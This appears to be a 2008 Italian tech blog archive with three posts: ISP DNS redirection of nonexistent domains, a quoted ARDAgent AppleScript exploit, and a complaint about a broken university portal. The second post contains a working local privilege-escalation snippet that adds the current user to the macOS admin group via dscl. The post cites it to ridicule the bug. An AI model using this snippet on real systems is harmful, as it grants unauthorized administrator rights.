Archivi per Luglio 2008
Verisign all'italiana
taniquetil:~ morpheus$ dig www.inesistente.it
; <<>> DiG 9.4.1-P1 <<>> www.inesistente.it
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 65074
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;www.inesistente.it. IN A
;; AUTHORITY SECTION:
it. 10800 IN SOA dns.nic.it. hostmaster.nic.it. 2008070908 10800 3600 604800 10800
;; Query time: 59 msec
;; SERVER: 192.168.200.1#53(192.168.200.1)
;; WHEN: Wed Jul 9 14:23:51 2008
;; MSG SIZE rcvd: 91
taniquetil:~ morpheus$ dig www.inesistente.it @85.37.17.5
; <<>> DiG 9.4.1-P1 <<>> www.inesistente.it @85.37.17.5
; (1 server found)
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8860
;; flags: qr; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;www.inesistente.it. IN A
;; ANSWER SECTION:
www.inesistente.it. 0 IN A 212.48.8.140
;; Query time: 54 msec
;; SERVER: 85.37.17.5#53(85.37.17.5)
;; WHEN: Wed Jul 9 14:24:02 2008
;; MSG SIZE rcvd: 52
taniquetil:~ morpheus$ whois -h whois.nic.it inesistente.it
Domain: inesistente.it
Status: AVAILABLE
Per la cronaca:
inetnum: 212.48.8.0 - 212.48.11.255
netname: MATRIXNET
descr: On Line services for advertising, marketing, media,
descr: publishing and shopping
Ma no, mica è una vulnerabilità grave...
set user_name to system attribute "USER"
tell application "ARDAgent" to do shell script "dscl localhost -append /Local/Default/Groups/admin GroupMembership " & user_name
Segreteria virtuale, bestemmie reali
Giornata di apertura della "caccia" per l'Università di L'Aquila: iniziano le iscrizioni per i test di medicina & co. Quale miglior banco di prova per il nuovo, sfavillante, strapagato ipertecnologico sistema informativo?
A questo coso noi poveri studenti dovremmo affidare gran parte della nostra carriera universitaria (tasse, prenotazione esami, stampa certificati, ecc. ecc. ecc.), quindi funziona, no?
No.
Alle ore 14:20, tentando di aprire https://segreteriavirtuale.univaq.it/Start.do si riceve in risposta una fantastica pagina bianca. Però la genera rapidamente, eh.
Forse un po' troppo rapidamente...
Affidiamoci al buon vecchio openssl:
redeemer:~ morpheus$ openssl s_client -connect segreteriavirtuale.univaq.it:443
<snip>
GET /Start.do HTTP/1.0
HTTP/1.1 200 OK
Connection: close
Date: Tue, 22 Jul 2008 12:25:35 GMT
Server: Microsoft-IIS/6.0
Set-Cookie:
JSESSIONID=#######################################;
Path=/; Secure
Content-Type: text/html
Content-Length: 0
read:errno=0
Content-Length 0 ?!?!?!?!?!?!?!?!?!?!?!? Affidabile, eh...
PS: stendiamo un velo pietoso sulla chiarezza delle informazioni (prima pagina: "si possono pagare le preiscrizioni con carta di credito" - pagina del pagamento: "Pagamento: Bollettino Bancario").
